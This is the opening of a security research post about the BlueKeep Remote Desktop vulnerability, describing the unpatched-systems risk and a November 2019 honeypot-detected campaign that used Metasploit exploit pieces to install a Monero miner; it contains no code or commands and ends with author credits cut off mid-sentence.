Microsoft issued a security patch for Windows systems in May of 2019 to close a serious vulnerability in the Remote Desktop Protocol (RDP) system that could allow an attacker to run programs and gain control of vulnerable Windows computers remotely. Despite dire warnings from Microsoft and U.S. Government officials to apply the security patch as soon as possible, millions of Windows systems connected to the Internet have remained unpatched and vulnerable to exploitation, leading security researchers to predict that a malware worm will likely take advantage of these vulnerable systems and mass-scan the Internet for more vulnerable systems–possibly leading to network congestion and worldwide slowing of data flow. On Saturday, November 2nd, security researchers running “honeypot” systems detected most of the honeypot systems with RDP port 3389 exposed to the Internet reporting a crash, which appeared to be related to exploitation activity. Closer examination by Marcus Hutchins, a security researcher from Kryptos Logic, confirmed that an attacker had used pieces of a publicly-available BlueKeep exploit from the penetration-testing tool Metasploit in an attempt to run a series of PowerShell scripts that result in downloading and running a malware program designed to mine Monero cryptocurrency. The Monero mining malware misuses computer resources and electricity to generate money for the attacker while slowing down the victim’s computer, but it would not allow the attacker to steal or destroy files. However, the same exploit could have been used to install any other type of malware, including Remote Access Trojans (RATs) or ransomware.
By Akshay Rohatgi and Randy Pargman About this Student Research Project Binary Defense’s mission is